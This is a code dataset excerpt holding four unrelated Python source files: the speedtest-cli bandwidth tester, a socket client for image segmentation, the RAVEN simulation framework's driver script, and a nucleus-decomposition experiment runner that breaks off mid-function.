source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
speedtest_cli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2015 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import sys
import math
import signal
import socket
import timeit
import platform
import threading
__version__ = '0.3.4'
# Some global variables we use
user_agent = None
source = None
shutdown_event = None
scheme = 'http'
# Used for bound_interface
socket_socket = socket.socket
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
e_http_py2 = sys.exc_info()
try:
from http.client import HTTPConnection, HTTPSConnection
except ImportError:
e_http_py3 = sys.exc_info()
raise SystemExit('Your python installation is missing required HTTP '
'client classes:\n\n'
'Python 2: %s\n'
'Python 3: %s' % (e_http_py2[1], e_http_py3[1]))
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
class SpeedtestCliServerListError(Exception):
"""Internal Exception class used to indicate to move on to the next
URL for retrieving speedtest.net server details
"""
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) +
math.cos(math.radians(lat1)) *
math.cos(math.radians(lat2)) * math.sin(dlon / 2) *
math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
def build_user_agent():
"""Build a Mozilla/5.0 compatible User-Agent string"""
global user_agent
if user_agent:
return user_agent
ua_tuple = (
'Mozilla/5.0',
'(%s; U; %s; en-us)' % (platform.system(), platform.architecture()[0]),
'Python/%s' % platform.python_version(),
'(KHTML, like Gecko)',
'speedtest-cli/%s' % __version__
)
user_agent = ' '.join(ua_tuple)
return user_agent
def build_request(url, data=None, headers={}):
"""Build a urllib2 request object
This function automatically adds a User-Agent header to all requests
"""
if url[0] == ':':
schemed_url = '%s%s' % (scheme, url)
else:
schemed_url = url
headers['User-Agent'] = user_agent
return Request(schemed_url, data=data, headers=headers)
def catch_request(request):
"""Helper function to catch common exceptions encountered when
establishing a connection with a HTTP/HTTPS request
"""
try:
uh = urlopen(request)
return uh, False
except (HTTPError, URLError, socket.error):
e = sys.exc_info()[1]
return None, e
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
request = build_request(self.url)
f = urlopen(request)
while 1 and not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
request = build_request(self.url, data=self.data)
f = urlopen(request)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
request = build_request('://www.speedtest.net/speedtest-config.php')
uh, e = catch_request(request)
if e:
print_('Could not retrieve speedtest.net configuration: %s' % e)
sys.exit(1)
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError: # Python3 branch
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
urls = [
'://www.speedtest.net/speedtest-servers-static.php',
'://c.speedtest.net/speedtest-servers-static.php',
'://www.speedtest.net/speedtest-servers.php',
'://c.speedtest.net/speedtest-servers.php',
]
errors = []
servers = {}
for url in urls:
try:
request = build_request(url)
uh, e = catch_request(request)
if e:
errors.append('%s' % e)
raise SpeedtestCliServerListError
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
uh.close()
raise SpeedtestCliServerListError
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError: # Python3 branch
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
raise SpeedtestCliServerListError
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']),
float(client['lon'])],
[float(attrib.get('lat')),
float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
except SpeedtestCliServerListError:
continue
# We were able to fetch and parse the list of speedtest.net servers
if servers:
break
if not servers:
print_('Failed to retrieve list of speedtest.net servers:\n\n %s' %
'\n'.join(errors))
sys.exit(1)
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
headers = {'User-Agent': user_agent}
start = timeit.default_timer()
h.request("GET", urlparts[2], headers=headers)
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event, source, scheme
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
_result = {}
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('byte', 1), default=('bit', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--timeout', default=10, type=int,
help='HTTP timeout in seconds. Default 10')
parser.add_argument('--secure', action='store_true',
help='Use HTTPS instead of HTTP when communicating '
'with speedtest.net operated servers')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
socket.setdefaulttimeout(args.timeout)
# Pre-cache the user agent string
build_user_agent()
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if args.secure:
scheme = 'https'
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
request = build_request(args.mini)
f = urlopen(request)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
request = build_request('%s/speedtest/upload.%s' %
(args.mini, ext))
f = urlopen(request)
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
_result['latency'] = '%(latency)s' % best
if not args.simple:
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
_result['download'] = '%0.2f' % ((dlspeed / 1000 / 1000) * 8)
_result['download'] = '%0.2f' % ((dlspeed / 1000 / 1000) * 8)
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
_result['upload'] = '%0.2f' % ((ulspeed / 1000 / 1000) * 8)
_result['upload'] = '%0.2f' % ((ulspeed / 1000 / 1000) * 8)
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
request = build_request('://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode(),
headers=headers)
f, e = catch_request(request)
if e:
print_('Could not submit results to speedtest.net: %s' % e)
sys.exit(1)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: %s://www.speedtest.net/result/%s.png' %
(scheme, resultid[0]))
return _result
return _result
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
segmentation.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#########################################################
# Copyright (C) 2022, Chen Jianqu, Shanghai University
#
# This file is part of is_slam.
#
# Licensed under the MIT License;
# you may not use this file except in compliance with the License.
#########################################################
from threading import Thread,Lock
import socket
import cv2
import numpy
import time
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def recvimage(conn):
length = recvall(conn,16)
stringData = recvall(conn, int(length))
data = numpy.fromstring(stringData, dtype='uint8')
decimg=cv2.imdecode(data,1)
return decimg
def sendimage(conn,img):
result, imgencode = cv2.imencode('.png',img, [int(cv2.IMWRITE_PNG_COMPRESSION),0])#采用最高质量的png压缩,防止失真
data = numpy.array(imgencode)
stringData = data.tostring()
conn.send( str(len(stringData)).ljust(16));
conn.send( stringData );
class Segmentation:
def __init__(self):
self.msg_list=[]
self.result_list=[]
self.msg_list_lock=Lock()
self.result_list_lock=Lock()
self.is_run=True
self.is_run_lock=Lock()
#启动处理线程
t = Thread(target=Segmentation.run, args=(self,))
t.setDaemon(True) #设置守护线程:给每个子线程一个timeout的时间,让他去执行,时间一到,不管任务有没有完成,直接杀死。
t.start()
#t.join() #线程同步:主线程结束后,进入阻塞状态,等待其它线程结束
def run(self):
address = ('localhost', 12345)
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(address)
counter=0
while self.get_state():
if(self.get_waiting_len()>0):
img,img_header,depth_msg=self.pop_msg()
sendimage(sock,img) #发送到服务端
result=recvimage(sock) #接收结果
#cv2.imwrite("/media/chen/chen/Robot/Data/InstanceSegmentation/test/"+str(counter)+".png",
# result,[int(cv2.IMWRITE_PNG_COMPRESSION),0])
counter+=1
self.push_result((result,img_header,depth_msg)) #放到结果队列
sock.close()
def get_state(self):
state=True
self.is_run_lock.acquire()
state=self.is_run
self.is_run_lock.release()
return state
def set_state(self,state):
self.is_run_lock.acquire()
self.is_run=state
self.is_run_lock.release()
def push_msg(self,msg):
self.msg_list_lock.acquire()
self.msg_list.append(msg)
self.msg_list_lock.release()
def pop_msg(self):
msg=0
self.msg_list_lock.acquire()
msg=self.msg_list.pop(0)
self.msg_list_lock.release()
return msg
def get_waiting_len(self):
length=0
self.msg_list_lock.acquire()
length=len(self.msg_list)
self.msg_list_lock.release()
return length
def push_result(self,msg):
self.result_list_lock.acquire()
self.result_list.append(msg)
self.result_list_lock.release()
def pop_result(self):
msg=0
self.result_list_lock.acquire()
msg=self.result_list.pop(0)
self.result_list_lock.release()
return msg
def get_result_len(self):
length=0
self.result_list_lock.acquire()
length=len(self.result_list)
self.result_list_lock.release()
return length
|
Driver.py
|
#!/usr/bin/env python
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Feb 20, 2013
@author: crisr
This is the Driver of RAVEN
"""
#For future compatibility with Python 3
from __future__ import division, print_function, absolute_import
import warnings
warnings.simplefilter('default',DeprecationWarning)
#End compatibility block for Python 3
#External Modules--------------------begin
import xml.etree.ElementTree as ET
import os
import sys
import threading
import time
import traceback
#External Modules--------------------end
#warning: this needs to be before importing h5py
os.environ["MV2_ENABLE_AFFINITY"]="0"
frameworkDir = os.path.dirname(os.path.abspath(__file__))
from utils import utils
import utils.TreeStructure as TS
utils.find_crow(frameworkDir)
if sys.version_info.major == 2:
utils.add_path_recursively(os.path.join(frameworkDir,'contrib','pp'))
else:
utils.add_path_recursively(os.path.join(frameworkDir,'contrib','pp3'))
utils.add_path(os.path.join(frameworkDir,'contrib','AMSC'))
utils.add_path(os.path.join(frameworkDir,'contrib'))
#Internal Modules
from Simulation import Simulation
from Application import __QtAvailable
from Interaction import Interaction
#Internal Modules
#------------------------------------------------------------- Driver
def printStatement():
"""
Method to print the BEA header
@ In, None
@ Out, None
"""
print("""
Copyright 2017 Battelle Energy Alliance, LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
""")
def printLogo():
"""
Method to print a RAVEN logo
@ In, None
@ Out, None
"""
print("""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.---. .------###### ##### ### ### ######## ### ###
/ \ __ / --### ### ### ### ### ### ### ##### ###
/ / \( )/ --### ### ### ### ### ### ###### ### ######
////// ' \/ ` --####### ######### ### ### ### ### #####
//// / // : : -### ### ### ### ###### #### ### ####
// / / /` '---### ### ### ### ### ######## ### ###
// //..\\
===========UU====UU=============================================================
'//||\\`
''``
""")
def checkVersions():
"""
Method to check if versions of modules are new enough. Will call sys.exit
if they are not in the range specified.
@ In, None
@ Out, None
"""
sys.path.append(os.path.join(os.path.dirname(frameworkDir),"scripts","TestHarness","testers"))
import RavenUtils
sys.path.pop() #remove testers path
missing,outOfRange,notQA = RavenUtils.checkForMissingModules(False)
if len(missing) + len(outOfRange) > 0 and RavenUtils.checkVersions():
print("ERROR: too old, too new, or missing raven libraries, not running:")
for error in missing + outOfRange + notQA:
print(error)
sys.exit(-4)
else:
if len(missing) + len(outOfRange) > 0:
print("WARNING: not using tested versions of the libraries:")
for warning in notQA + missing + outOfRange:
print(warning)
if __name__ == '__main__':
"""This is the main driver for the RAVEN framework"""
# Retrieve the framework directory path and working dir
printLogo()
printStatement()
checkVersions()
verbosity = 'all'
interfaceCheck = False
interactive = Interaction.No
workingDir = os.getcwd()
## Remove duplicate command line options and preserve order so if they try
## conflicting options, the last one will take precedence.
sys.argv = utils.removeDuplicates(sys.argv)
itemsToRemove = []
for item in sys.argv:
# I don't think these do anything. - talbpaul, 2017-10
if item.lower() in ['silent','quiet','all']:
verbosity = item.lower()
itemsToRemove.append(item)
elif item.lower() == 'interfacecheck':
interfaceCheck = True
itemsToRemove.append(item)
elif item.lower() == 'interactive':
if __QtAvailable:
interactive = Interaction.Yes
else:
print('Qt is not available, disabling interactive mode.\n')
itemsToRemove.append(item)
elif item.lower() == 'interactivecheck':
if __QtAvailable:
interactive = Interaction.Test
else:
print('Qt is not available, disabling interactive check.\n')
itemsToRemove.append(item)
## Now outside of the loop iterating on the object we want to modify, we are
## safe to remove each of the items
for item in itemsToRemove:
sys.argv.remove(item)
if interfaceCheck:
os.environ['RAVENinterfaceCheck'] = 'True'
else:
os.environ['RAVENinterfaceCheck'] = 'False'
simulation = Simulation(frameworkDir, verbosity=verbosity, interactive=interactive)
#If a configuration file exists, read it in
configFile = os.path.join(os.path.expanduser("~"),".raven","default_runinfo.xml")
if os.path.exists(configFile):
tree = ET.parse(configFile)
root = tree.getroot()
if root.tag == 'Simulation' and [x.tag for x in root] == ["RunInfo"]:
simulation.XMLread(root,runInfoSkip=set(["totNumCoresUsed"]),xmlFilename=configFile)
else:
e=IOError('DRIVER',str(configFile)+' should only have Simulation and inside it RunInfo')
print('\nERROR! In Driver,',e,'\n')
sys.exit(1)
# Find the XML input file
if len(sys.argv) == 1:
#NOTE: This can be overriden at the command line:
# python Driver.py anotherFile.xml
# or in the configuration file by DefaultInputFile
inputFiles = [simulation.getDefaultInputFile()]
else:
inputFiles = sys.argv[1:]
for i in range(len(inputFiles)):
if not os.path.isabs(inputFiles[i]):
inputFiles[i] = os.path.join(workingDir,inputFiles[i])
simulation.setInputFiles(inputFiles)
#Parse the input
#For future developers of this block, assure that useful, informative exceptions
# are still thrown while parsing the XML tree. Otherwise any error made by
# the developer or user might be obfuscated.
for inputFile in inputFiles:
try:
tree = TS.parse(open(inputFile,'r'))
except TS.InputParsingError as e:
print('\nInput Parsing error!',e,'\n')
sys.exit(1)
#except? riseanIOError('not possible to parse (xml based) the input file '+inputFile)
if verbosity=='debug':
print('DRIVER','opened file '+inputFile)
root = tree.getroot()
if root.tag != 'Simulation':
e=IOError('The outermost block of the input file '+inputFile+' it is not Simulation')
print('\nInput XML Error!',e,'\n')
sys.exit(1)
# call the function to load the external xml files into the input tree
cwd = os.path.dirname(os.path.abspath(inputFile))
simulation.XMLpreprocess(root,cwd)
#generate all the components of the simulation
#Call the function to read and construct each single module of the simulation
simulation.XMLread(root,runInfoSkip=set(["DefaultInputFile"]),xmlFilename=inputFile)
def raven():
"""
A worker function that allows the computation of the main RAVEN execution
to be offloaded to another thread, freeing the main thread for UI
interaction (Qt requires UI to be handled on the main thread of execution)
"""
simulation.initialize()
simulation.run()
## If there is an associated UI application, then we can quit it now that
## we are done, the main thread does not know when this done presumably
## because this thread still is technically running as long as the app,
## which both threads can see, has not called quit. Otherwise, we could do
## this after the while loop below.
if simulation.app is not None:
simulation.app.quit()
if simulation.app is not None:
try:
## Create the thread that will run RAVEN, and make sure that it will die if
## the main thread dies by making it a daemon, then start it up
ravenThread = threading.Thread(target=raven)
ravenThread.daemon = True
ravenThread.start()
## If there is an associated application, then we can start it up now as
## well. It will listen for UI update requests from the ravenThread.
if simulation.app is not None:
simulation.app.exec_()
## This makes sure that the main thread waits for RAVEN to complete before
## exiting, however join will block the main thread until ravenThread is
## complete, thus ignoring any kill signals until after it has completed
# ravenThread.join()
waitTime = 0.1 ## in seconds
## So, in order to live wait for ravenThread, we need a spinlock that will
## allow us to accept keyboard input.
while ravenThread.isAlive():
## Use one of these two alternatives, effectively they should be the same
## not sure if there is any advantage to one over the other
time.sleep(waitTime)
# ravenThread.join(waitTime)
except KeyboardInterrupt:
if ravenThread.isAlive():
traceback.print_stack(sys._current_frames()[ravenThread.ident])
print ('\n\n! Received keyboard interrupt, exiting RAVEN.\n\n')
except SystemExit:
if ravenThread.isAlive():
traceback.print_stack(sys._current_frames()[ravenThread.ident])
print ('\n\n! Exit called, exiting RAVEN.\n\n')
else:
raven()
|
run_necleus_decomposition.py
|
import socket
from exec_utilities import time_out_util
from config import *
from exec_utilities.exec_utils import *
from multiprocessing import Process
def run_exp(env_tag=knl_tag, with_c_group=True, data_path_tag=necleus_decomp_exec_path_tag):
hostname = socket.gethostname()
with open('config.json') as ifs:
my_config_dict = json.load(ifs)[env_tag]
our_exec_path = my_config_dict[data_path_tag]
data_set_path = my_config_dict[data_set_path_tag]
thread_num_lst = ['40']
data_set_lst = my_config_dict[data_set_lst_tag]
exp_res_root_name = 'exp_results'
folder_name = 'exp-2019-10-07-hidx' + os.sep + env_tag
our_exec_name_lst = [
'pnd',
'hidx-org'
]
kt_type_dict = {
'ustgpu1': '2300',
'ustgpu2': '2300'
}
kt_type_name = kt_type_dict[hostname.strip()]
work_dir = os.sep.join(['.', exp_res_root_name, folder_name])
os.system('mkdir -p ' + work_dir)
logger = get_logger(os.sep.join([work_dir, hostname + '.log']), name=__name__)
logger.info(my_splitter + time.ctime() + my_splitter)
logger.info('res folder: {}'.format(folder_name))
logger.info('our exec folder: {}'.format(our_exec_path))
logger.info('our exec name list: {}'.format(our_exec_name_lst))
logger.info('thread# lst: {}'.format(thread_num_lst))
logger.info('data set lst: {}'.format(data_set_lst))
def one_round():
for data_set_name in data_set_lst:
for our_algorithm in our_exec_name_lst:
if data_set_name == 'webgraph_twitter' and our_algorithm == 'hidx-org':
continue
for t_num in thread_num_lst:
statistics_dir = os.sep.join(map(str, ['.', exp_res_root_name, folder_name, data_set_name, t_num]))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'log']))
statistics_file_path = statistics_dir + os.sep + our_algorithm + '-' + kt_type_name + '.log'
dstat_file_path = statistics_dir + os.sep + our_algorithm + '-' + kt_type_name + '-dstat.log'
log_file_path = os.sep.join(
[statistics_dir, 'log', '-'.join([our_algorithm, kt_type_name, 'raw.log'])])
logger.info('stat file path: {}'.format(statistics_file_path))
logger.info('log file path: {}'.format(log_file_path))
# 1st: append headers
append_header(statistics_file_path)
append_header(dstat_file_path)
append_header(log_file_path)
# 2nd: run exec cmd
algorithm_path = our_exec_path + os.sep + our_algorithm
params_lst = map(str, ['cgexec -g memory:yche-exp' if with_c_group else '', algorithm_path,
data_set_path + os.sep + data_set_name, kt_type_name,
statistics_file_path, ])
cmd = ' '.join(params_lst)
logger.info('exec-cmd: {}'.format(cmd))
time_out = 3600 * 5
my_env = os.environ.copy()
def execute_cmd(my_cmd):
logger.info('sub-process: {}'.format(my_cmd))
os.system(my_cmd)
# 3rd: spawn a new process to run the exec
